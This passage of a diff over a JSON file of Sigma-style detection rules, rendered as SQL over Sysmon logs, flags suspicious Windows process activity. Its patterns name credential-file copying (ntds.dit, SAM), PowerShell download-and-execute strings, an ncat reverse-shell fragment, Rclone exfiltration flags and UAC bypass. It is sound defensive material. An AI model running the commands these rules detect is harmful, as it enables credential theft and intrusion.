'%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\notepad.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\')) AND NOT (((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% stop%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\at.exe' ESCAPE '\\' AND CommandLine LIKE '%interactive%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_manageengine_pattern.yml" + "filename": "proc_creation_win_at_interactive_execution.yml" }, { - "title": "PsExec Service Child Process Execution as LOCAL SYSTEM", - "id": "7c0dcd3d-acf8-4f71-9570-f448b0034f94", + "title": "Operator Bloopers Cobalt Strike Modules", + "id": "4f154fb6-27d1-4813-a759-78b93e0b9c48", "status": "experimental", - "description": "Detects suspicious launch of the PSEXESVC service on this system and a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system running it with highest privileges and not only the privileges of the login user account (e.g. the administrator account)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Cobalt Strike module/commands accidentally entered in CMD shell", + "author": "_pete_0, TheDFIRReport", "tags": [ - "attack.execution" + "attack.execution", + "attack.t1059.003" ], "falsepositives": [ - "Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE 'C:\\\\Windows\\\\PSEXESVC.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'Cmd.Exe' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ShareFinder%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SMBAutoBrute%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR CommandLine LIKE '%zerologon%' ESCAPE '\\' OR CommandLine LIKE '%av\\_query%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sysinternals_psexesvc_as_system.yml" + "filename": "proc_creation_win_hktl_cobaltstrike_bloopers_modules.yml" }, { - "title": "HackTool - CrackMapExec Execution Patterns", - "id": "058f4380-962d-40a5-afce-50207d36d7e2", - "status": "stable", - "description": "Detects various execution patterns of the CrackMapExec pentesting framework", - "author": "Thomas Patzke", + "title": "PUA - Nmap/Zenmap Execution", + "id": "f6ecd1cf-19b8-4488-97f6-00f0924991a3", + "status": "test", + "description": "Detects usage of namp/zenmap. Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1047", - "attack.t1053", - "attack.t1059.003", - "attack.t1059.001", - "attack.s0106" + "attack.discovery", + "attack.t1046" ], "falsepositives": [ - "Unknown" + "Network administrator computer" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%cmd.exe /Q /c % 1> \\\\%\\\\%\\\\% 2>&1' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /C % > \\\\%\\\\%\\\\% 2>&1' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /C % > %\\\\Temp\\\\% 2>&1' ESCAPE '\\') AND (CommandLine LIKE '%powershell.exe -exec bypass -noni -nop -w 1 -C \"%' ESCAPE '\\' OR CommandLine LIKE '%powershell.exe -noni -nop -w 1 -enc %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\nmap.exe' ESCAPE '\\' OR Image LIKE '%\\\\zennmap.exe' ESCAPE '\\') OR OriginalFileName IN ('nmap.exe', 'zennmap.exe')))" ], - "filename": "proc_creation_win_hktl_crackmapexec_execution_patterns.yml" + "filename": "proc_creation_win_pua_nmap_zenmap.yml" }, { - "title": "Suspicious Encoded Obfuscated LOAD String", - "id": "9c0295ce-d60d-40bd-bd74-84673b7592b1", - "status": "test", - "description": "Detects suspicious base64 encoded and obbfuscated LOAD string often used for reflection.assembly load", - "author": "pH-T (Nextron Systems)", + "title": "HackTool - GMER Rootkit Detector and Remover Execution", + "id": "9082ff1f-88ab-4678-a3cc-5bcff99fc74d", + "status": "experimental", + "description": "Detects the execution GMER tool based on image and hash fields.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027" + "attack.defense_evasion" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%OgA6ACgAIgBMACIAKwAiAG8AYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATAAiACsAIgBvAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAIgArACIAbwBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAIgBMAG8AIgArACIAYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATABvACIAKwAiAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAbwAiACsAIgBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAIgBMAG8AYQAiACsAIgBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACIATABvAGEAIgArACIAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAiAEwAbwBhACIAKwAiAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMACcAKwAnAG8AYQBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATAAnACsAJwBvAGEAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAJwArACcAbwBhAGQAJwApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMAG8AJwArACcAYQBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATABvACcAKwAnAGEAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAbwAnACsAJwBhAGQAJwApA%' ESCAPE '\\' OR CommandLine LIKE '%OgA6ACgAJwBMAG8AYQAnACsAJwBkACcAKQ%' ESCAPE '\\' OR CommandLine LIKE '%oAOgAoACcATABvAGEAJwArACcAZAAnACkA%' ESCAPE '\\' OR CommandLine LIKE '%6ADoAKAAnAEwAbwBhACcAKwAnAGQAJwApA%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\gmer.exe' ESCAPE '\\' OR (Hashes LIKE '%MD5=E9DC058440D321AA17D0600B3CA0AB04%' ESCAPE '\\' OR Hashes LIKE '%SHA1=539C228B6B332F5AA523E5CE358C16647D8BBE57%' ESCAPE '\\' OR Hashes LIKE '%SHA256=E8A3E804A96C716A3E9B69195DB6FFB0D33E2433AF871E4D4E1EAB3097237173%' ESCAPE '\\') OR md5 = 'e9dc058440d321aa17d0600b3ca0ab04' OR sha1 = '539c228b6b332f5aa523e5ce358c16647d8bbe57' OR sha256 = 'e8a3e804a96c716a3e9b69195db6ffb0d33e2433af871e4d4e1eab3097237173'))" ], - "filename": "proc_creation_win_powershell_base64_load.yml" + "filename": "proc_creation_win_hktl_gmer.yml" }, { - "title": "Adwind RAT / JRAT", - "id": "1fac1481-2dbc-48b2-9096-753c49b4ec71", - "status": "test", - "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", - "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", + "title": "PUA - Rclone Execution", + "id": "e37db05d-d1f9-49c8-b464-cee1a4b11638", + "status": "experimental", + "description": "Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc", + "author": "Bhabesh Raj, Sittikorn S, Aaron Greetham (@beardofbinary) - NCC Group", "tags": [ - "attack.execution", - "attack.t1059.005", - "attack.t1059.007" + "attack.exfiltration", + "attack.t1567.002" + ], + "falsepositives": [ + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Oracle%' ESCAPE '\\' AND CommandLine LIKE '%\\\\java%' ESCAPE '\\' AND CommandLine LIKE '%.exe %' ESCAPE '\\') OR (CommandLine LIKE '%cscript.exe%' ESCAPE '\\' AND CommandLine LIKE '%Retrive%' ESCAPE '\\' AND CommandLine LIKE '%.vbs %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%--config %' ESCAPE '\\' AND CommandLine LIKE '%--no-check-certificate %' ESCAPE '\\' AND CommandLine LIKE '% copy %' ESCAPE '\\') OR ((Image LIKE '%\\\\rclone.exe' ESCAPE '\\' OR Description = 'Rsync for cloud storage') AND (CommandLine LIKE '%pass%' ESCAPE '\\' OR CommandLine LIKE '%user%' ESCAPE '\\' OR CommandLine LIKE '%copy%' ESCAPE '\\' OR CommandLine LIKE '%sync%' ESCAPE '\\' OR CommandLine LIKE '%config%' ESCAPE '\\' OR CommandLine LIKE '%lsd%' ESCAPE '\\' OR CommandLine LIKE '%remote%' ESCAPE '\\' OR CommandLine LIKE '%ls%' ESCAPE '\\' OR CommandLine LIKE '%mega%' ESCAPE '\\' OR CommandLine LIKE '%pcloud%' ESCAPE '\\' OR CommandLine LIKE '%ftp%' ESCAPE '\\' OR CommandLine LIKE '%ignore-existing%' ESCAPE '\\' OR CommandLine LIKE '%auto-confirm%' ESCAPE '\\' OR CommandLine LIKE '%transfers%' ESCAPE '\\' OR CommandLine LIKE '%multi-thread-streams%' ESCAPE '\\' OR CommandLine LIKE '%no-check-certificate %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_malware_adwind.yml" + "filename": "proc_creation_win_pua_rclone_execution.yml" }, { - "title": "Bypass UAC via Fodhelper.exe", - "id": "7f741dcf-fc22-4759-87b4-9ae8376676a2", - "status": "test", - "description": "Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes.", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", + "title": "Potential Russian APT Credential Theft Activity", + "id": "b83f5166-9237-4b5e-9cd4-7b5d52f4d8ee", + "status": "stable", + "description": "Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1548.002" + "attack.credential_access", + "attack.t1552.001", + "attack.t1003.003" ], "falsepositives": [ - "Legitimate use of fodhelper.exe utility by legitimate user" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\fodhelper.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%xcopy /S /E /C /Q /H \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%\\\\sysvol\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%adexplorer -snapshot \"\" c:\\\\users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\downloads\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.snp%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_fodhelper.yml" + "filename": "proc_creation_win_apt_bear_activity_gtr19.yml" }, { - "title": "Potential PowerShell Execution Policy Tampering - ProcCreation", - "id": "cf2e938e-9a3e-4fe8-a347-411642b28a9f", + "title": "RunDLL32 Spawning Explorer", + "id": "caa06de8-fdef-4c91-826a-7f9e163eef4b", "status": "experimental", - "description": "Detects changes to the PowerShell execution policy registry key in order to bypass signing requirements for script execution from the CommandLine", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects RunDLL32.exe spawning explorer.exe as child, which is very uncommon, often observes Gamarue spawning the explorer.exe process in an unusual way", + "author": "elhoim, CD_ROM_", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%\\\\ShellIds\\\\Microsoft.PowerShell\\\\ExecutionPolicy%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\PowerShell\\\\ExecutionPolicy%' ESCAPE '\\') AND (CommandLine LIKE '%Bypass%' ESCAPE '\\' OR CommandLine LIKE '%RemoteSigned%' ESCAPE '\\' OR CommandLine LIKE '%Unrestricted%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND Image LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT (ParentCommandLine LIKE '%\\\\shell32.dll,Control\\_RunDLL%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_registry_set_unsecure_powershell_policy.yml" + "filename": "proc_creation_win_rundll32_spawn_explorer.yml" }, { - "title": "HackTool - KrbRelay Execution", - "id": "e96253b8-6b3b-4f90-9e59-3b24b99cf9b4", + "title": "Mstsc.EXE Execution From Uncommon Parent", + "id": "ff3b6b39-e765-42f9-bb2c-ea6761e0e0f6", "status": "experimental", - "description": "Detects the use of KrbRelay, a Kerberos relaying tool", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects potential RDP connection via Mstsc using a local \".rdp\" file located in suspicious locations.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1558.003" + "attack.lateral_movement" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\KrbRelay.exe' ESCAPE '\\' OR OriginalFileName = 'KrbRelay.exe') OR (CommandLine LIKE '% -spn %' ESCAPE '\\' AND CommandLine LIKE '% -clsid %' ESCAPE '\\' AND CommandLine LIKE '% -rbcd %' ESCAPE '\\') OR (CommandLine LIKE '%shadowcred%' ESCAPE '\\' AND CommandLine LIKE '%clsid%' ESCAPE '\\' AND CommandLine LIKE '%spn%' ESCAPE '\\') OR (CommandLine LIKE '%spn %' ESCAPE '\\' AND CommandLine LIKE '%session %' ESCAPE '\\' AND CommandLine LIKE '%clsid %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\brave.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\CCleanerBrowser.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\chrome.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\chromium.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\firefox.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\msedge.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\opera.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\whale.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\outlook.exe' ESCAPE '\\') AND (Image LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR OriginalFileName = 'mstsc.exe'))" ], - "filename": "proc_creation_win_hktl_krbrelay.yml" + "filename": "proc_creation_win_mstsc_run_local_rpd_file_susp_parent.yml" }, { - "title": "Copying Sensitive Files with Credential Data", - "id": "e7be6119-fc37-43f0-ad4f-1f3f99be2f9f", - "status": "test", - "description": "Files with well-known filenames (sensitive files with credential data) copying", - "author": "Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "title": "Allow Service Access Using Security Descriptor Tampering Via Sc.EXE", + "id": "6c8fbee5-dee8-49bc-851d-c3142d02aa47", + "status": "experimental", + "description": "Detects suspicious DACL modifications to allow access to a service from a suspicious trustee. This can be used to override access restrictions set by previous ACLs.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.003", - "car.2013-07-001", - "attack.s0404" + "attack.persistence", + "attack.t1543.003" ], "falsepositives": [ - "Copying sensitive files for legitimate use (eg. backup) or forensic investigation by legitimate incident responder or forensic invetigator" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\esentutl.exe' ESCAPE '\\') AND (CommandLine LIKE '%vss%' ESCAPE '\\' OR CommandLine LIKE '% /m %' ESCAPE '\\' OR CommandLine LIKE '% /y %' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\windows\\\\ntds\\\\ntds.dit%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\system %' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\security%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%A;%' ESCAPE '\\') AND (CommandLine LIKE '%;IU%' ESCAPE '\\' OR CommandLine LIKE '%;SU%' ESCAPE '\\' OR CommandLine LIKE '%;BA%' ESCAPE '\\' OR CommandLine LIKE '%;SY%' ESCAPE '\\' OR CommandLine LIKE '%;WD%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_esentutl_sensitive_file_copy.yml" + "filename": "proc_creation_win_sc_sdset_allow_service_changes.yml" }, { - "title": "Greenbug Espionage Group Indicators", - "id": "3711eee4-a808-4849-8a14-faf733da3612", - "status": "test", - "description": "Detects tools and process executions used by Greenbug in their May 2020 campaign as reported by Symantec", - "author": "Florian Roth (Nextron Systems)", + "title": "PUA - CleanWipe Execution", + "id": "f44800ac-38ec-471f-936e-3fa7d9c53100", + "status": "experimental", + "description": "Detects the use of CleanWipe a tool usually used to delete Symantec antivirus.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.g0049", - "attack.execution", - "attack.t1059.001", - "attack.command_and_control", - "attack.t1105", "attack.defense_evasion", - "attack.t1036.005" + "attack.t1562.001" ], "falsepositives": [ - "Unlikely" + "Legitimate administrative use (Should be investigated either way)" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%:\\\\ProgramData\\\\adobe\\\\Adobe.exe' ESCAPE '\\' OR Image LIKE '%:\\\\ProgramData\\\\oracle\\\\local.exe' ESCAPE '\\' OR Image LIKE '%\\\\revshell.exe' ESCAPE '\\' OR Image LIKE '%\\\\infopagesbackup\\\\ncat.exe' ESCAPE '\\' OR Image LIKE '%:\\\\ProgramData\\\\comms\\\\comms.exe' ESCAPE '\\') OR (CommandLine LIKE '%-ExecutionPolicy Bypass -File%' ESCAPE '\\' AND CommandLine LIKE '%\\\\msf.ps1%' ESCAPE '\\') OR (CommandLine LIKE '%infopagesbackup%' ESCAPE '\\' AND CommandLine LIKE '%\\\\ncat%' ESCAPE '\\' AND CommandLine LIKE '%-e cmd.exe%' ESCAPE '\\') OR (CommandLine LIKE '%system.Data.SqlClient.SqlDataAdapter($cmd); [void]$da.fill%' ESCAPE '\\' OR CommandLine LIKE '%-nop -w hidden -c $k=new-object%' ESCAPE '\\' OR CommandLine LIKE '%[Net.CredentialCache]::DefaultCredentials;IEX %' ESCAPE '\\' OR CommandLine LIKE '% -nop -w hidden -c $m=new-object net.webclient;$m%' ESCAPE '\\' OR CommandLine LIKE '%-noninteractive -executionpolicy bypass whoami%' ESCAPE '\\' OR CommandLine LIKE '%-noninteractive -executionpolicy bypass netstat -a%' ESCAPE '\\') OR CommandLine LIKE '%L3NlcnZlcj1%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SepRemovalToolNative\\_x64.exe' ESCAPE '\\' OR (Image LIKE '%\\\\CATClean.exe' ESCAPE '\\' AND CommandLine LIKE '%--uninstall%' ESCAPE '\\') OR (Image LIKE '%\\\\NetInstaller.exe' ESCAPE '\\' AND CommandLine LIKE '%-r%' ESCAPE '\\') OR (Image LIKE '%\\\\WFPUnins.exe' ESCAPE '\\' AND CommandLine LIKE '%/uninstall%' ESCAPE '\\' AND CommandLine LIKE '%/enterprise%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_greenbug_may20.yml" + "filename": "proc_creation_win_pua_cleanwipe.yml" }, { - "title": "Potential Privilege Escalation To LOCAL SYSTEM", - "id": "207b0396-3689-42d9-8399-4222658efc99", + "title": "Potential CVE-2023-21554 QueueJumper Exploitation", + "id": "53207cc2-0745-4c19-bc72-80be1cc16b3f", "status": "experimental", - "description": "Detects unknown program using commandline flags usually used by tools such as PsExec and PAExec to start programs with SYSTEM Privileges", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.resource_development", - "attack.t1587.001" - ], + "description": "Detects potential exploitation of CVE-2023-21554 (dubbed QueueJumper)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "falsepositives": [ - "Weird admins that rename their tools", - "Software companies that bundle PsExec/PAExec with their software and rename it, so that it is less embarrassing" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '% -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i -s powershell%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%paexec%' ESCAPE '\\' OR CommandLine LIKE '%PsExec%' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\Windows\\\\System32\\\\mqsvc.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsl.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sysinternals_susp_psexec_paexec_flags_.yml" + "filename": "proc_creation_win_exploit_cve_2023_21554_queuejumper.yml" }, { - "title": "PowerShell Web Download and Execution", - "id": "85b0b087-eddf-4a2b-b033-d771fa2b9775", - "status": "experimental", - "description": "Detects suspicious ways to download files or content and execute them using PowerShell Invoke-Expression", - "author": "Florian Roth (Nextron Systems)", + "title": "Adwind RAT / JRAT", + "id": "1fac1481-2dbc-48b2-9096-753c49b4ec71", + "status": "test", + "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", + "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", "tags": [ "attack.execution", - "attack.t1059" - ], - "falsepositives": [ - "Scripts or tools that download files and execute them" + "attack.t1059.005", + "attack.t1059.007" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%.DownloadString(%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WebRequest %' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\') AND (CommandLine LIKE '%IEX(%' ESCAPE '\\' OR CommandLine LIKE '%IEX (%' ESCAPE '\\' OR CommandLine LIKE '%I`EX%' ESCAPE '\\' OR CommandLine LIKE '%IE`X%' ESCAPE '\\' OR CommandLine LIKE '%I`E`X%' ESCAPE '\\' OR CommandLine LIKE '%| IEX%' ESCAPE '\\' OR CommandLine LIKE '%|IEX %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Expression%' ESCAPE '\\' OR CommandLine LIKE '%;iex $%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Oracle%' ESCAPE '\\' AND CommandLine LIKE '%\\\\java%' ESCAPE '\\' AND CommandLine LIKE '%.exe %' ESCAPE '\\') OR (CommandLine LIKE '%cscript.exe%' ESCAPE '\\' AND CommandLine LIKE '%Retrive%' ESCAPE '\\' AND CommandLine LIKE '%.vbs %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_download_iex.yml" + "filename": "proc_creation_win_malware_adwind.yml" }, { - "title": "PUA - DIT Snapshot Viewer", - "id": "d3b70aad-097e-409c-9df2-450f80dc476b", - "status": "test", - "description": "Detects the use of Ditsnap tool, an inspection tool for Active Directory database, ntds.dit.", - "author": "Furkan Caliskan (@caliskanfurkan_)", 